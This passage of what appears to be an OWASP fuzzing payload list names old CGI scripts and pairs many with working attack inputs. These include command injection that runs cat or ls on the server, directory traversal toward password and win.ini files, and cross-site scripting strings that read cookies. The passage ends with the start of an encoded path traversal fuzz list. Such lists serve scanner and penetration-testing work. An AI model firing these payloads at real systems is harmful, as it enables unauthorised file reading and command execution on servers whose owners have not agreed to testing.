calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
